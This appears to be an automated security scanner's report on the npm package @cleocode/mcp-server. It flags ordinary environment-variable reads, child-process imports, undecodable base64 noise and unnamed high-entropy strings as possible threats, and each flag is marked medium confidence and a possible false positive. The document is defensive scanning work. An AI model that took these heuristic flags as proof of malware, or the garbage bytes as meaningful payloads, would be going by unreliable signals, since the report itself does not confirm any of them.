@cleocode/mcp-server

Environment file access

Detected by automated pattern matching (rule DE-002) with medium confidence. May be a false positive.

    32: function loadFromEnv(key) {
    33:     const envKey = `${ENV_PREFIX}${key.toUpperCase()}`;
>>> 34:     return process.env[envKey];
    35: }
    36: /**

Environment file access

Detected by automated pattern matching (rule DE-002) with medium confidence. May be a false positive.

    28: function getCurrentSessionId() {
    29:     // TODO: Integrate with session system when available
>>> 30:     return process.env.CLEO_SESSION_ID || null;
    31: }
    32: /**

Environment file access

Detected by automated pattern matching (rule DE-002) with medium confidence. May be a false positive.

    935:     // Extract task ID from params if present
    936:     const taskId = typeof request.params?.taskId === 'string' ? request.params.taskId : undefined;
>>> 937:     const sessionId = process.env.CLEO_SESSION_ID || null;
    938:     // Log mutation attempt to audit trail
    939:     const auditEntry = {

Environment file access

Detected by automated pattern matching (rule DE-002) with medium confidence. May be a false positive.

    250:  */
    251: export function resolveProjectRoot() {
>>> 252:     return process.env.CLEO_ROOT || process.cwd();
    253: }
    254: /**

Environment file access

Detected by automated pattern matching (rule DE-002) with medium confidence. May be a false positive.

    45:     const filename = `${schemaType}.schema.json`;
    46:     // Check project root schemas/
>>> 47:     const projectRoot = process.env.CLEO_ROOT || process.cwd();
    48:     const paths = [
    49:         join(projectRoot, 'schemas', filename),

Environment file access

Detected by automated pattern matching (rule DE-002) with medium confidence. May be a false positive.

    151:  */
    152: export function isAutoInitEnabled() {
>>> 153:     return process.env.CLEO_AUTO_INIT === 'true';
    154: }
    155: /**

Environment file access

Detected by automated pattern matching (rule DE-002) with medium confidence. May be a false positive.

    100:     }
    101:     // 2. Check standard CLI path from config
>>> 102:     const configPath = process.env.CLEO_CLI_PATH;
    103:     if (configPath) {
    104:         const result = testCLIPath(configPath);

Environment file access

Detected by automated pattern matching (rule DE-002) with medium confidence. May be a false positive.

    92: function checkCLIAvailability() {
    93:     // 1. Check CLEO_MCP_CLI_PATH env
>>> 94:     const envPath = process.env.CLEO_MCP_CLI_PATH;
    95:     if (envPath) {
    96:         const result = testCLIPath(envPath);

Environment file access

Detected by automated pattern matching (rule DE-002) with medium confidence. May be a false positive.

    81:  */
    82: function getConfiguredMode() {
>>> 83:     const env = process.env.MCP_EXECUTION_MODE?.toLowerCase();
    84:     if (env === 'native' || env === 'cli' || env === 'auto') {
    85:         return env;

Environment file access

Detected by automated pattern matching (rule DE-002) with medium confidence. May be a false positive.

    25:     }
    26:     try {
>>> 27:         const projectRoot = process.env.CLEO_ROOT || process.cwd();
    28:         const versionPath = join(projectRoot, 'VERSION');
    29:         const version = readFileSync(versionPath, 'utf-8').trim();

Environment file access

Detected by automated pattern matching (rule DE-002) with medium confidence. May be a false positive.

    64:                 timeout,
    65:                 cwd: options.cwd || process.cwd(),
>>> 66:                 env: { ...process.env, ...env },
    67:                 maxBuffer: 10 * 1024 * 1024, // 10MB buffer
    68:             });

Decoded base64 content: r��"������+r

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: ���7����&��7�

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: ��bu�^2�Z��ڭ��

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: ��bu�^K+-zcڭ��

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: ��bu�^JH���ڭ��

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: ��bu�^K+-zcڭ��

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: ��bu�^JH���ڭ��

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: i�b�*'jS뢗��'�

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: ��bu�^2�Z��ڭ��

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: �'�s'%xIߢ����

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: �'�s'%xIߢ����

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: �'�s'%xIߢ����

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: �'�s'%xIߢ����

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: �'�s'%xIߢ����

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: �'�s'%xIߢ����

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: �'�s'%xIߢ����

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: �'�s'%xIߢ����

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: �'�s'%xIߢ����

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Node.js child process spawning

Detected by automated pattern matching (rule SC-005) with medium confidence. May be a false positive.

    7:  * @task T2914
    8:  */
>>> 9: import { exec } from 'child_process';
    10: import { promisify } from 'util';
    11: import { buildCLICommand } from './command-builder.js';

Node.js child process spawning

Detected by automated pattern matching (rule SC-005) with medium confidence. May be a false positive.

    74:             const duration = Date.now() - startTime;
    75:             // Handle exec errors (exit code, timeout, etc.)
>>> 76:             if (error.code === 'ERR_CHILD_PROCESS_STDIO_MAXBUFFER') {
    77:                 return {
    78:                     success: false,

Decoded base64 content: ���j��k)hi�bzWl

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: ���j��k)hi�bzWl

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Decoded base64 content: ~��j�ڮؚ�+�q�,

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

Node.js child process spawning

Detected by automated pattern matching (rule SC-005) with medium confidence. May be a false positive.

    11:  * Controlled by MCP_EXECUTION_MODE environment variable.
    12:  */
>>> 13: import { execFileSync } from 'child_process';
    14: /**
    15:  * Detect CLI availability and determine execution mode.

Decoded base64 content: r��"������+r

Detected by automated pattern matching (rule DO-BAS) with medium confidence. May be a false positive.

High-entropy string (4.7 bits/char) — possible encoded payload

Detected by automated pattern matching (rule EN-001) with medium confidence. May be a false positive.

High-entropy string (4.8 bits/char) — possible encoded payload

Detected by automated pattern matching (rule EN-001) with medium confidence. May be a false positive.

High-entropy string (4.6 bits/char) — possible encoded payload

Detected by automated pattern matching (rule EN-001) with medium confidence. May be a false positive.

High-entropy string (4.5 bits/char) — possible encoded payload

Detected by automated pattern matching (rule EN-001) with medium confidence. May be a false positive.

High-entropy string (4.5 bits/char) — possible encoded payload

Detected by automated pattern matching (rule EN-001) with medium confidence. May be a false positive.

High-entropy string (4.9 bits/char) — possible encoded payload

Detected by automated pattern matching (rule EN-001) with medium confidence. May be a false positive.

High-entropy string (4.7 bits/char) — possible encoded payload

Detected by automated pattern matching (rule EN-001) with medium confidence. May be a false positive.

High-entropy string (4.6 bits/char) — possible encoded payload

Detected by automated pattern matching (rule EN-001) with medium confidence. May be a false positive.

High-entropy string (4.8 bits/char) — possible encoded payload

Detected by automated pattern matching (rule EN-001) with medium confidence. May be a false positive.

High-entropy string (4.6 bits/char) — possible encoded payload

Detected by automated pattern matching (rule EN-001) with medium confidence. May be a false positive.

High-entropy string (4.6 bits/char) — possible encoded payload

Detected by automated pattern matching (rule EN-001) with medium confidence. May be a false positive.

High-entropy string (4.6 bits/char) — possible encoded payload

Detected by automated pattern matching (rule EN-001) with medium confidence. May be a false positive.

High-entropy string (4.6 bits/char) — possible encoded payload

Detected by automated pattern matching (rule EN-001) with medium confidence. May be a false positive.